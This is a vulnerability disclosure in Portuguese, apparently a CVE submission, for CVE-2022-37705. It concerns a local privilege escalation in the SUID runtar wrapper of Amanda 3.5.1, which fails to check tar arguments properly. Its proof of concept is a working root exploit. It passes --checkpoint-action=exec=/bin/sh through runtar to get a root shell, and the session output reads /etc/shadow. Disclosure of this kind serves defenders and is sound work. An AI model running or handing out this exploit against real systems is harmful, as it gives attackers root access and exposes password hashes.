
Amanda 3.5.1 second LPE.
[Descrição sugerida] Foi encontrada uma falha de escalonamento de privilégios no Amanda 3.5.1 que pode levar o usuário backup a privilégios de root. O componente vulnerável é o runtar SUID que é apenas um wrapper para executar /usr/bin/tar com argumentos específicos que são controláveis pelo atacante. O programa não verifica corretamente os argumentos passados para o binário tar (ele assume que todos os args devem ser assim --ARG VALOR, mas podemos fornecer --ARG=VALOR como um único argumento).
[Informações Adicionais] Esta falha pode ser usada para Execução de Código, Negação de Serviço, Escalonamento de Privilégios e Divulgação de Informações. Este é o PoC para explorá-la e obter um shell root: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Tipo de Vulnerabilidade Outro] Verificação falha de argumentos.
[Fornecedor do Produto] Amanda
[Base de Código do Produto Afetado] runtar - 3.5.1
[Componente Afetado] O binário SUID afetado é : runtar O arquivo afetado é : runtar.c As linhas de código afetadas começam na linha 162.
[Tipo de Ataque] Local
[Impacto Execução de Código] true
[Impacto Negação de Serviço] true
[Impacto Escalonamento de Privilégios] true
[Impacto Divulgação de Informações] true
[Vetores de Ataque] Para explorar o binário, basta fornecer argumentos maliciosos ao binário SUID runtar para escalar para root.
[Referência] http://www.amanda.org/
[Descobridor] Maher Azzouzi
Utilize o CVE-2022-37705.